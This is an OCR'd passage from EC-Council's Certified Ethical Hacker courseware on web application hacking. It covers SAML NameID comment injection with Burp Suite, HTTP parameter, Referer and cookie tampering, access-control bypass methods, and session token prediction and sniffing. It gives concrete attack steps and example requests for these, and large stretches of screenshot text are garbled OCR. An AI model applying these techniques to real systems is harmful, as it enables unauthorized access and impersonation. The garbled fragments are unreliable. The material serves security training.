project and navigate to the 'Proxy' tab to ensure that the proxy is activated.
• In Burp Suite, first, go to the "Extender" tab and then go to "BApp store". Then, click
and install "SAML Raider" extension.
• Access Burp Suite and ensure that the "Proxy" tab displays "Intercept is on". It enables
Burp to find and tamper with requests directed to the servers. When the user's browser
is pointed to the target ([email protected]) website's secured registration page, Burp Suite
indicates that the user is passed to the ldP system.
■ SAML Raider displays a tab with the same name when there is SAML data that is to be
decrypted. Users may need to pass a few more requests before they notice the "SAML
Raider" tab with a request. Clicking on the "Forward" button can take the user to the
ldP login page.
• Soon after the user enters the credentials for [email protected], Burp
once again impedes some web requests. Until it shows the "SAML Raider" tab, keep
clicking the "Forward' tab to pass them without modifications. Consequently, SAML
responses from the ldP system can also be impeded.
• Going through the response can allow a user to find "NamelD" . It is located below the
key and signature tabs.

Burp ProjKt Intruder Repeater Window Help

Sequencer Comparer Extender ProjKt options User options

Dashboard Target Intruder Repeater

J J HTTP history T WebSockets history JOptions )

[!j O it.41Ynt tit
I ,__. II Dr-,. I ll'lten• " ' • I NW j

l.!.J ,.;;:I_,=-- - - - - - - ' - "

•) I ,r..,..-..i..er•wur ( -...et w.,.....- I AsH.rtlon
c~ Hot w.... 101,. .-nnt , 1 n 101z

~-·
c ~ Hot Me,

sl• "•tu,11:
~ ~
1011+1-nn, ,, n 1012

.,_ ,,.,_,., .,..nooo,ot/'m"IW.,.an•..h•l

0.,Hl~ hetlo l/ W W w • J ~.-1~1
l.!.J ' - - - - - - - - -~• l ~~• 11
=~~:n'!
"'-•tkn M wtliM )
s~~lu t
~C.-.1Nt4 hlw ,
II ~"-•.... I

NJ•q-c ds:X500Ceru h cn P
c/ds:~U►
< 1 dt::Ke yinfo>
..-,ds:Sltn,ature>
112 <Na\:SUbJK t >
lU <S-M\ :NtaeJO • ~, ;-.,na• ,rn:Nt1•:naas:u :SAK..:2.0:~1d- fo.-..t:pera1sunt•~ ~ 1 v •r•1ty. coa. lakedo-.un .c:oac1 . . .\ :,_._t0ti4
11' ~ \: SubJKtC.onf1 r. .t1 on * t iada•urn:oasia:naa.t:tc: s.K..:2.0:c■ :be-•r•r• ►
U~ <s. .t: SUbJ.c tGonf 1r•n1one.t•
Ut I• .. • ~f•T.ZM20d21icf&a~~•
117 NQt , 4ft. · • •2018-0t 25TJO:A6:5"S.?OlZ" AKlPlfflt•• https: / f ~ t - .•rs1 ty. ♦du /$h1 boo\eth.Ho/ SAH..2tPOSr♦ />
111 </H11\:9.A:>J ♦e to,.,hrNtlon>
119 -c/ua\:SUbJ♦e. t>
120 <'ha\:Conchuons ..,ti
fo, • "2018-0t-25Tl9:<ll:2S.701Z" Ni;,t Aft •"2018-04 25Tl9:46:~.101Z">
Ul CSMS\:auch enceflastnc t1 on>
122 <H•\:auch encu,https: //~ 1 ver$1 ty.edu/llh1bbohth< u■\: aud1enc••
in -c,.-\:Audunc9Atst n c u on>

Figure 14.72: Screenshot of Burp Suite capturing SAML messages

Module 14 Page 2047 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Now, add your own comment between two domain names and pass the response.

0 ee Bur. ·. · ·.: · · . : : ~. ·. .· , ·
Burp Project Intruder Repeater Window Help

Sequencer T Decoder l Comparer T Extender T Project options l Us.er options

Dashboard T Target T T Intruder T Repeater

J l HTTP history } WebSockets history } Options )

{!J •••.1uti.
( _.,. ti - ) ..,,.,,.~ .. - 1

(tM,Mft NM Jilur 2011.0.M~n, ,, U 701%

Sl1n•tutc
$iti'wiCMt•~ ha»/twwwwJ~_.,.,.,.....,.l
~ - - - - - - - - - - f ..__,, J f co,.....,.,,...,. ]
==~;! I I lR4..S.O,, Mcs~ J
Sultjcd
~rtCtnl Htte«f«•
~ctcOIII Mtlltu 201,..•nn,,,ss101z
[Mrr,ldwlth

NJxq,c1cft:~rt1f1utt>
</ch: :X50'101t• .
c ds:Keytnfo>
◄;ch:Slpture>
n2 <ual:SlJbJect>
111 ~ <SNl :NMIJD l •urn:OHn:,,.,..:tc:~:2.0:~1d, forNt:p,9r•nttl'lt •,,.dm,~n•n1ty,coac, • l•t•i n .. ►.fek....,1n.coac1 1-N1l : N.-11 ~
2U <N11\:SubJt<tC.onf1rNt ton •um:o,•1•:~: tc:S,N,1..:2.0:tt1:bt,1rtr•>
u~ c:ual:9.0J.cteonf1rNt1onOlt•
116 I · • - f•"34b20d28<f&llooH-
U7 No1 •1 · •Zna•CM mto:.te:5&.?012· Atc1p1tnt••http,: 11~1,er,1c1 .tcll19'1bbo\tth.Ho/SM't..21POSr• / >
ill c -.,.\:SubJt<t<:onhrNUon>
119 ,C/ ....t:SUbJKt>
12'0 <Na\:Conchtiont "»t tor• "2011·04 25Tl9:41:2$.701Z· J.at,)',Or1i•t "2011·04·2'5T19: <115:!6.701Z'">
lll cua\ :Au1htnetAtttnct1on>
122 <sMt:.tit,1ehtne•>tntps://M9tU"'1 v•r•t ty .edu/ sh1bbol•th<Jna\:.tiudunu>
in .,.,.\:Auch.nc:eAtstncuon►

Figure 14.73: Screenshot of Burp Suite m anipulat ing SAML m essages

■ In this case, as the signature is matching with the valid response, the SP approves and
processes the first text parameter in NamelD: [email protected].
Attackers use this technique to bypass the SAML-based SSO process and tamper with the
responses.

Module 14 Page 2048 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Attack Authorization Schemes

First, access the web application using account with low privileges and then escalate the privileges to access
protected resources

Manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields
that rel ate to user ID, username, access group, cost, filen ames, file identifiers, etc.

0 Uniform Resource Identifier

0 Parameter Tampering

...___I
e _ Po_sr Dat_a _ _____.I I e HTTP Headers

[! Quer, St,ing and Cookies [ e Hidden Tags

]
Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Authorization Attack: H'CTP Request Tampering

If the query st ri ng is visible i n t he add ress bar on the browser, th entry to change the stri ng parameters to bypass
authorization mechanisms

Query http· //www. c e rtified.hacker com/mail . aspx?ma1lbox= John&company=acme%20com

String https://certifiedhackershop com/books/download/ 852741369 pdf
Tampering https·//ce rt1£1e dhackerbank ccm/login/home Jsp?admin= true

Use web spide ring tools such as Burp Suite to scan the web app for POST paramete rs

If the application uses t he Referer header for making access cont rol decisions, t hen try to modify it to access protected
application functionalities

= 201 HTTP/1 1
GET h t tp //cert1.f1.edhacker 8180/Appl1cat1 ons/Download'>ItemID
Ho st J a na1.na 8180
HTTP User Agent Mozilla/5 0 (Window U Wind ows NT 5 2 e n US rv 1 8 1 4 ) Gecko/20070515 Firefox/2 0 04
Accept text/xml appl1cat1 on/xml appl1ca t1on/xhtml+xml t e xt /htmt l q -0 9 text /plain q-=0 8 1mage/png * /* q-=0 5
Headers
Proxy -Connect.1.on keep- a.11 ve
Referer http //cert1f1edhacker 8lBO/Appl1ca t1ons /Download'>Adm1n = Fa l s e

Here, ltemlD = 201 is not accessible because the Ad min paramet er is setto false, but you can change it to t rue and
access protected items

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2049 Ethical Hacking and Countermeasures Copyright © by EC-Council

A ll Right s Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Authorization Attack: Cookie Parameter Tampering

In the first step, col lect some session cookies set by the web application and analyze them t o determine the cookie generation mechanism

Trap session cookies set by the web app lication, tampe r its parameters using tools such as Burp Suite, and replay the app lication

------ _,_ ___ ,...

-..____.. ..• Pl
-
---
- - - --
,.._ ,. , .............,_ _ _ ... !,.,.,.,1
•-(!) - - - .......
--·-- -'1
c.--
.
"'
. . ,.._,,.hto _,,,..1

.... ....,.._,..,..._,..,,-.....
..... i . - ........ . . . . ,

- .....,_
,
- - - -. . . . . . . . f\ .. ,
I
......... -•11~1 ,.._,."I ,,,. ....., , , _ l ' l , o h • N I
.........,..... _ ..... ,_,,..,ol ...' _, .......,.. - · - - • • - · $ X • ~[ t i~~f:~: :•~:~~-~:•~~=~~-:~~.
-............ -....
__
--c....i.
- _.,
,.............
.. - -• · -... -
_. , ... 1-0
"'""
"""' _ ....u,,.-,...,.. , ~• ,_ 1~•
,........... ........ ,
Ca< . . ,c.-,,,1

------------------
(l)(t ... ... C?>Ot--+
htrp!.://portswigger.net

Copynght Cl by EC-CIUIR:11 All Rights Reserved Reproduction IS Strictly Prohibited

Attack Authorization Schemes

A web application contains an authorization mechanism that restricts access to a specific
resource or functionality (e.g., Adm in page) by authenticated users. The web application always
performs user authorization following authentication. An attacker implements the flawed
authorization mechanism in the web application and takes advantage of it to access restricted
pages by escalating privileges. The attacker tries to gain access to information without proper
credentials. Thus, the attacker uses various techniques to attack the authorization schemes of
the web application.
Authorization Attack

In an authorization attack, the attacker first finds a legitimate account with limited privileges,
then logs in as that user, and gradually escalates privileges to access protected resources.
He/she then manipulates the HTTP requests to subvert the application authorization schemes
by modifying input fields related to the user ID, username, access group, cost, file names, file
identifiers, etc. Attackers use sources such as uniform resource identifiers, parameter
tampering, POST data, HTTP headers, query strings, cookies, and hidden tags to perform
authorization attacks.
• Uniform Resource Identifier: A uniform resource identifier (URI) provides a means to
identify a resource. It is a global identifier for Internet resources accessed remotely or
locally. An attacker may use URls to access documents/directories that are protected
from publishing, inject SQL queries or other unused commands into an application,
and/or make a user view a certain site that is connected to another server.
■ Parameter Tampering: Parameter tampering involves the manipulation of parameters
exchanged between the server and the client to modify the application data, such as
price and quantity of products, permissions, and user credentials. This information is

Module 14 Page 2050 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

usually stored in cookies, URL query strings, or hidden form fields, and attackers can use
them to increase control and application functionality.
■ POST Data: POST data often comprises authorization and session information, as the
information provided by the client must be associated with the session that provided it.
The attacker can exploit vulnerabilities in the post data and easily manipulate it.
■ HTTP Headers: Web browsers do not allow header modification. Therefore, to modify
the header, the attacker has to write his/her own program and perform the HTTP
request. He/she may also use available tools to modify any data sent from the browser.
In general, an authorization HTTP header contains a username and password encoded in
Base-64. The attacker can compromise the header by submitting two HTTP requests
bound in the same header. The proxy system executes the first HTTP header and the
target system executes the other HTTP header, allowing the attacker to bypass the
proxy's access control.
■ Query String and Cookies: Browsers use cookies to maintain their state in the stateless
HTTP protocol as well as to store user preferences, session tokens, and other data.
Clients can modify the cookies and send them to the server with URL requests, thereby
allowing the attacker to modify the cookie content. Cookie modification depends on the
cookie usage, which ranges from session tokens to authorized decision-making arrays.
■ Hidden Tags: When a user selects anything on an HTML page, the selection is stored as a
form field value and sent to the application as an HTTP request (GET or POST). HTML can
store field values as hidden fields, which the browser does not extract to the screen;
instead, it collects and submits these fields as parameters during form submissions,
which the user can manipulate. However, he/she has to make a choice. Code sent to
browsers does not have any security value; therefore, by manipulating the hidden
values, the attacker can easily access the page and run it in the browser.
Authorization Attack: HTTP Request Tampering

HTTP headers control information passed from web clients to web servers on HTTP requests
and from web servers to web clients on HTTP responses. Each header consists of a single text
line with a name and a value. There are two main ways to send data with HTTP: via the URL or
the form. Tampering with HTTP data refers to modifying data of the HTTP request (or response)
before the recipient reads it. The attacker changes the HTTP request without using another
user's ID.
■ Query String Tampering

If the query string is visible in the address bar in the browser, then try to change the
string parameter to bypass authorization mechanisms. You can use web spidering tools
such as Burp Suite to scan the web application for POST parameters.

Module 14 Page 2051 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

http://www.certifiedhacker.com/mail.aspx?mailbox=john&company=acme%20com
https : //certifiedhackershop.com/books/download/ 852741369 . pdf
https : //certifiedhackerbank .com/login/home.jsp?admin=true

Figure 14.74: Screenshot displaying Query String Tampering

■ HTTP Headers

If the application uses the Referer header for making access control decisions, then try
to modify it to access protected application functionalities. In the example below,
ltemlD = 201 is not accessible as the Admin parameter is set to false; you can change it
to true and access protected items.

GET http://certifiedhacker:8l80/Applications/Download 0 ItemID = 201 HTTP/1.l

Host: janaina:8180
User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-US; l.""V':1.8.1.4) Gecko/20070515 Firefox/2.0.04
Accept: text/xml, application/xml, application/xhtml+xml,text/htmtl;q-0.9,text/plain;q=0.8,image/png,*/*,q=0.5

Proxy-Connection: keep-alive
Referer: http://certifiedhaclcer:8180/Applications/Oownload? Admin False

Figure 14.75: Screenshot displaying HTTP Headers

Authorization Attack: Cookie Parameter Tampering

Cookie parameter tampering is a method used to tamper with the cookies set by the web
application to perform malicious attacks. When the user logs into the site, the web application
sets the session cookie and stores it in the browser.

Cookie parameter tampering is performed in the following steps:

1. In the first step, collect some session cookies set by the web application and analyze
them to determine the cookie generation mechanism

2. In the second step, trap the session cookie set by the web application, tamper its
parameters using tools such as Burp Suite, and replay it to the application to gain
unauthorized access to others' profiles

3. The tool intercepts every request sent from the browser and allows you to edit the
cookie to replace it with the tampered cookie parameters. If the cookie is not secure,
you may be able to guess the parameters
■ Burp Suite

Source: https://portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications.
It has various tools that work together to support the entire testing process, from initial
mapping and analysis of an application's attack surface to finding and exploiting security
vulnerabilities.

Module 14 Page 2052 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

p' R~l•""'/,.,__,,..,.,4_epu-lO (10 10 I It]

-..... ..._.. ....
Q)
'-A o,,.p ..... • KTTM

l QET
l ""' : -
- "'·"'.
/ • i ~rohle upoh4-1 HTrP/1 l
oovu•c:•H . co■
UHr •Aqtltt 1'0n\1o/5 O Cw , ~ NT 10 O, n · 7f,OI GKh/201.00101 l"irefo,/71 O
o Acc:"'1 : tut/ht ■\.-\1n11011/01¥to\•u\.0H1l1c:ohon/••l;<t-O t. 1..,01Mb11.•/ • , .,.o.1
(J) X

S ACUVl · Lt11'14...0 1 Cll•US,ctl: <t-0,5

.t.c:nvt -&c:ott11t9 • 111, Nthu
~ ~u~r hnp:/JW,,,, OOU H C:Oflil C:HflllN • . ., .

9 C-,,,.,C:t1to\. clOH
l. Ceoh t ! HC:OCl...lJifydltflw.- J Ill Ubl 1- 0
ll "'9rU1• Insttu,. , Aequtt'U l

_......
l7 Ckbe•Conuo\ •••·"9•0
",. 118
e... '"'lffl
~
~ 11,PQUr
l099f<
w ..... H!\'I
[ot-'tr
...
°'.._" T-,rt
"'''Nil■rf ~NII--, ~
j> ~Mta,,l........ ~ t - . . 0 (101011')
, _• ._ [ Oro, -=-:1111 .i.rt.... ♦ KTTM {1)
Ill "" "' • (J) X
l GET /u"""' roh h . up• h d-2 1-ff'l"P/l l
J ~ 1- . oov1uc:0111 c:oo
• Ul•• ••irt ""n\h/5 0 IW1"4oYII NT 10 O; ,.,71.0I Gitc:h/20100101 f'irefo,/78 o
• Ac:upt ; tut/t,\o\,,pp\1<.ttol"/d,hl•u\ ,opphuhOft/00\;q,,.0.9. 1. .,oe/vdi,. • l • .c,,-0.8
S Ac<ept • L1t1q!.1110 t trH.1$,e,,; q--0.S
6 Ac:npt •kodlltf 9 up . 4tfhn
Aefert r: ...,_tp:/,-, ■ ■•UHo,• ,o■/uwH • a,,.
Q)® +- ➔
- - - - - - - - - - - - - - - - - - -.... l
n
I °"' I
e■..Mnn" don
GNh 1 1 H(°"_.lJWydf!+.....o- J Ul U b l 1• 0
""•"••tn5..:1,1••·"-~"'• 1
....
,.,.
ll Oleh<l•C■ fttro\ •••·at..o
itoqi,KIC■eliHDI

~twNH'IUU

Figure 14.76: Screenshots of Burp Suite

Module 14 Page 2053 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Attack Access Controls

Exploiting Insecure Access Controls
Wa lk t hrough a website t o ident ify t he fol lowing access cont rols
deta ils of the applicat ions:
Parameter-Based Access Control
e Individual access to a particular subset of data
e Levels of access granted (employees, managers, supervisors, Atta ckers utilize request parameters assigned to
CEOs, etc.) administrators to gain access t o administrative
8 Administrator f unctionality for configuring and monitoring funct ions

e Functionalitiesthata llowthe escalation of privileges

Referer-Based Access Control
HTTP referre r provides access control decisions
Access Controls Attack Methods
Attackers exploit t he HTTP referrer and mani pulat e
8 Attack with Different User Account s it to any value

e Attack Multistage Processes

Location-Based Access Control
e Attack St atic Resources
Attackers can bypass locatiori-based access controls
e Attack Direct Access to Methods by using a web -proxy, a VPN, a data roaming ena bl ed
mobile device, di rect manipulati on of cl ient-side
!! Attack Restricti ons on HTTP M ethods
mechanisms, etc.

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Attack Access Controls

Access controls are part of the application's security mechanisms that are logically based on
authentication and session management. An attacker walks through a website to identify the
following access controls details of the application:
• Individual access to a particular subset of data
■ Levels of grant access {employees, managers, supervisors, CEOs, etc.)
■ Administrator functionality to configure and monitor
• Functionalities that allow escalating privileges
Exploiting Insecure Access Controls

• Parameter-Based Access Control : Any web application consists of various request

parameters such as cookies and query string parameters. The application determines
the access granted to a request based on these parameters. These parameters vary
between a normal user and an administrator. Sometimes, these parameters are invisible
to normal users and visible only to administrators. If an attacker can identify the
parameters that are assigned to an administrator, he/she can set those parameters in
their own requests and gain access to administrative functions.
■ Referer-Based Access Control : In some web applications, the HTTP referer is the
foundation for major access control decisions. The HTTP referer is considered unsafe;
the attacker can use it and manipulate it to any value.
• Location-Based Access Control : The user's geographic location can be determined using
various methods. The most common method to determine the current location is
through the IP address. Attackers can bypass location-based access controls using a web

Module 14 Page 2054 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

proxy, a VPN, a data-roaming-enabled mobile device, direct manipulation of client-side

mechanisms.
Access Controls Attack Methods

• Attack with different user accounts: Attempt to access the application with different
user accounts. If there is any broken access control in the web application, it allows you
to access the resources and functionality as a legitimate user. You can use tools such as
Burp Suite to access and compare two different user contexts.
■ Attack Multistage Processes: The abovementioned technique will be ineffective if there
is a multistage process established in the web application architecture. In this multistage
process, the user will perform multiple entries at multiple levels to complete the
intended process. In a multistage process, multiple requests will be sent to the server
from the client. To attack such a process, each and every request to the server should be
captured and tested for access controls. Another way to attack a multistage process
manually is to walk through a protected multistage process several times in your
browser and use proxy tools to switch the session token supplied in different requests
to that of a less privileged user.
• Attack Static Resources: Identify the web applications where the protected static
resources are accessed by the URLs. Attempt to request these URLs directly and check
whether they are providing access to unauthorized users.
• Attack Direct Access to Methods: Web applications accept certain requests that provide
direct access to server-side APls. If there are any access control weaknesses in these
direct access methods, an attacker can exploit them and compromise the system .
• Attack Restrictions on HTTP Methods: It is important to test different HTTP methods
such as GET, POST, PUT, DELETE, TRACE, and OPTIONS. The attacker modifies the HTTP
methods to compromise web applications. If the web application accepts these
modified requests, the access controls can be bypassed.

Module 14 Page 2055 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Attack Session Management Mechanism

Attackers break an application's session management mechanism to bypass the authentication

controls and impersonate privileged application users

Session Token Generation Session Tokens Handling

e Session Tokens Prediction e Man-in-the-Middle Attack

e Session Tokens Tampering e Session Replay

- e Session Hijacking

Copynght Cl by EC-C1unc1I All Rights Reserved Reproduction is Stnctly Proh1b1ted

Attacking Session Token Generation Mechanism

Weak Encoding Example

https : //www . certifiedhacker . ccxn/checkout?
SessionToken=%75%73%65%72%3D%6A%61 %73%6F %6E%3B%61%70%70%3D%61 %64 %6D %69%6E%3B%64
%61 %74%65%3D%30 %38 %2F%30%31 %2F%32%30%32 %30

When hex-encoding an ASCII string user=jason;app=admin;date=0S/01/2020, you can predict another session t o ken
by just changing the date for use in another transaction with the server

Session Token Prediction

e Obtain va lid session tokens by sniffing the traffic or legitimately logging into the application and analyzing it for
encoding (hex-encoding, Ba se64) or any pattern

e If any meaning can be reverse -engineered from the sample of session tokens, then att empt to guess the tokens
recently issued to other appli cation users
e Make a large number of requests with the predicted tokens to a session-dependent page t o det erm ine a valid
session token

COpynght Cl by EC-C1uncil All Rights Reserve d Reproduction IS Strictly Prohibited

Module 14 Page 2056 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Attacking Session Tokens Handling Mechanism:

Session Token Sniffing

file fOit Y- ~ 'apun &w,i'yle if,l1.tSbe$ ltlephony n•ei-. !oob !!efJI

Sniff the application traffic using ■ -~ 0 ~ '?, q
a sniffing tool such as Wireshark a .•
NO. 11ml s«Hc•
or an intercepting proxy such as ttMM-rim2 iri'/¥hi
112ZJ.tl611-1.t.11.11l It II.I II IITTP 471 G£T ""'"'•••'If'•lff'Pll.1
Burp Suite 162.151. 121.lt ~ IET /ap1/v2/v11teot. . . .lN.J-1ullbKt•JQue,>yll...,_11. .615

:: ~::== i::!::i:~
1.9123.721748381 11.11.1 1l MTTP
28c' U.7lt5113tt 11.11.1.13 162.IS,, 121.'1 HTTP ~1 5(1' /1ipl/V2/VJOI0/69U7N.]SOl'l'Jc■ lllllKll•JQUlryt1311tll11-16lSL
HITT , .I &ET /apVV2/vldl6/14:tnl7 . JIDl'll?ClllllachJQutry1UIHU1UllSL

.tet27.'3,&NJ7. . lt.11.t 1l
i!2i~~ !!
lt.lt.1 It
1 11
· IITTP
IITTP
Ul1 POST /lftdtll,illlpa HTTP/I I ( ~l U&t1oru'a •-rOt"a•Wl-d)
' " e£l /v1.,..,ru, . ■1p1'l'1d~1 HTT1'/l,1
OZ 21.19U21MI tt.11.1,U H2.1!11, 121.6l K1TI' 5t31£T /ap1M/v1oeot..... lN.J1«1'kallbKt•1Qiuery11-..S2tn1u
If HTTP cookies are being used ■U 21.1M7321M 11.11.1.13
■9' 21.1N9S<l2N II.It 1.11
1"2.lst. 121.tl
1&2159 121,61
HITT
KTTP
512 G£T /lfll.h2/vlfff/1.t2tN1.Json1c1ll1111Ck•JO.-,ryllJIUS%t1J714t
592 "1 /ipl.J"V2/11lltlOJIHt719.J•on1c1\U111Ci1.•Jqu.ry1lleCIOZ97l7U9

as the transmission mechanism

for session tokens and the
• J:r - " : 431 llyl ♦t Ofl wlrt (l<l41 Oils), 01 llylH u,pt11red (3-Ut OIU ) on lflttrf 1c. tlM, Id t
secure flag is not set, then try to • Ethtrl'lllt It, Src:: ltS•Nl8·Pflyt.Serwr•21..S4:tl:M:99 (l2:1S:$cl:2l:1t:tt), Ost: "5·11.8•1't!y.strwr•2L5111: U:1t:N (t2:IS:5111:2"l:1t:N)
, lnt tmtt Protocol VtrllOfl , , Sr c:: 11.11.1.u, Olt: 11.st.1.1'
replay the cookie to gain .
, T
.,....,...,...
• Tran1a1111on Control ProuKo\, Src Pon: $8661, t>n Port: ••
/11\f\n
: 1, N;t: 1, LM'I: an

unauthorized access to the t:--1tsc•.c•r

UMr-Agtnt: IIDUlla/S.t (WlMOwS ., 11.0; rv:71.t) Glck012tHlt111 J:irtrox/11.1\r\ft
ACC-,1: llllll'll•l,appUCl!lOA/Jd'll•l•1U1l,ippl1ClllOl\/•t:qs.t.9,1.Nfll...bp, "/';q~.l\r\ll
application AcC:.,l•llt9,.: tn•I.IS,tn;q~t, "r\n
.r.cc:.,1.£ncocHnt: gtlp, dtH•tt\f\11

Use session cookies to perform

iii11.111a~w,
session hijacking, session replay,
and Man-in-the-Middle attacks

https://www.wireshort.org

Copynght Cl by EC-Ctuncil All Rights Reserved Reproduction 1s Stnctly Prohibited

Attack Session Management Mechanism

Web application session management involves exchanging sensitive information between the
server and its clients wherever required . If such session management is insecure, the attacker
can take advantage of it to attack the web application through the session management
mechanism, which is the key security component in most web applications.
Nowadays, most attackers target application session management to launch malicious attacks
against web applications, allowing them to easily bypass robust authentication controls and
masquerade as other users without even knowing their credentials (usernames, passwords).
Attackers can even take control of the entire application by compromising a system
administrator's account.
Session Management Attack

A session management attack is a method used by attackers to compromise a web application.

Attackers break an application's session management mechanism to bypass the authentication
controls and impersonate privileged application users. It involves two stages: session token
generation and exploitation of session token handling.
To generate a valid session token, attackers engage in the following:
• Session Token Prediction: Attackers can do this when they realize that the server uses a
deterministic pattern between session IDs. By successfully gaining the previous and next
session IDs of the user, the attacker can perform malicious attacks pretending to be the
user.
■ Session Token Tampering: Once the attackers gain the previous and next session ID,
they can tamper with the session data and engage in further malicious activities.

Module 14 Page 2057 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Once attackers generate a valid session token, they try to exploit session token handling as
follows:
■ Man-in-the-Middle (MITM) Attack: Attackers intercept communication between two
systems on a network. They divide the network connection into two: one between the
client and the attacker, and the other between the attacker and server, which then acts
as a proxy in the intercepted connection.
■ Session Hijacking: Attackers steal the user session ID from a trusted website to perform
malicious activities.
■ Session Replay: Attackers obtain the user session ID and then reuse it to gain access to
the user account.
Attacking Session Token Generation Mechanism
To determine the session token generation mechanism in a session management attack,
attackers steal valid session tokens and then predict the next session token .
Through session prediction, attackers identify a pattern in the session token exchanged
between the client and the server. This can happen when the web application has weak,
predictable session identifiers. For example, when the web application assigns a session token
sequentially, attackers can predict the previous and next session tokens by knowing any session
ID. Before predicting a session identifier, attackers have to obtain sufficient valid session tokens
for legitimate system users.
■ Weak Encoding Example
When hex encoding an ASCII string user=jason;app=admin; date=08/01/2020, you can
predict another session token by just changing the date and use it for another
transaction with the server.
https://www.certifiedhacker.com/checkout?
SessionToken=%75 %73 %65%72 %3D%6A%61%73 %6F%6E%3B%61%70 %70 %3D%61%64 %6D%69%
6E%3B%64 %61 %74 %65%3D%30%38 %2F%30%31 %2F%32%30%32 %30

■ Session Token Prediction

o Obtain valid session tokens by sniffing the traffic or legitimately logging into the
application and analyzing it for encoding (hex encoding, Base64) or any pattern
o If any meaning can be reverse engineered from the sample of session tokens, then
attempt to guess the tokens recently issued to other application users
o Make a large number of requests with the predicted tokens to a session-dependent
page to determine a valid session token
Attacking Session Tokens Handling Mechanism: Session Token Sniffing
First, sniff network traffic for valid session tokens and then use them to predict the next session
token. Use the predicted session ID to authenticate with the target web application.

Module 14 Page 2058 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

The steps for session token sniffing are as follows :

• Sniff the application traffic using a sniffing tool such as Wireshark or an intercepting
proxy such as Burp Suite
• If HTTP cookies are being used as the transmission mechanism for session tokens and
the secure flag is not set, then try to replay the cookie to gain unauthorized access to
the application
■ Use session cookies to perform session hijacking, session replay, and MITM attacks
Thus, sniffing the valid session token is important in session management attacks.
• Wireshark

Source: https://www.wireshark.org
Wireshark is a network protocol analyzer that allows attackers to capture and
interactively browse network traffic. Wireshark captures live network traffic from
Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and
FDDI networks, thus helping attackers sniff session IDs in transit to and from a target
web application.

!•le fd,t l,'.oew i;o ~apture ~lyze ~USIICS "Telephony ~orelcss !ools tlefp
iT
■
(I!http cookie
NO. Time Source DesMallon Protocol 0
!"ll·l■I·
18.18 1 19
:Iii·
HTTP
1.aJtt1%-.,aM·e
898 POS{ HTTP/ l.1 (appUcallon/x.•..WW• forn-urlenc:Oded)
182 23.836811l888 18.Ul.l .13 18.19 1 19 IITTP 478 GET /lndu.a<px IITTP/1.1
198 23.728748309 18.19. 1.13 162.159 128.61 IITTP 582 G£T /1pl/v2/v1deo/ 48888186. J son?ca llback•J Query1838G81218A615
29-1 23.730588388 10.19.1. 13 162.159.U8.61 HTTP 581 G£T /apl/V2/Vlde0/6959789. Json?ca l loack•JQutry1838881218461SL
295 23. 730618889 18.19.1. 13 162.159 128.01 HTTP 581 GET /apl/v2/vldto/7428997. Json?callback•JQutry18388812184615L
480 27 .020897589 19. 18. I. 13 18 18 1 19 IITTP U87 POST /Index aspx HTTP/1 1 (appt1cat1on/x-ww-ror•-ur1encodod)
489 27.634863789 18.19. 1. 13 18.18 1 19 IITTP 499 G£T / viewproflle .aspx?id~l IITTP/1.1
492 28.196527609 18.19. 1. 13 162.159 128.61 HTTP 593 G£T /apl/v2/videof48888186.Json?callback•JQuery18300452873714
493 28.196732908 18.18.1. 13 162 .159 . 128. 61 HTTP 592 GET /apl/v2/vldeo/7428997. Json?ca I lback•JQuery183004528737149
494 28.10Cl954289 18.19. 1. 13 162. 159 128. 01 IITTP 592 GET /apl/v2/vldeo/0959789 Json?calll>ack-JQutry18388•1528737149

~ruoe 33: 431 bytes on wire (3448 blU), 431 bytes captured (3448 bits) on lnterrace ethG, Id 8
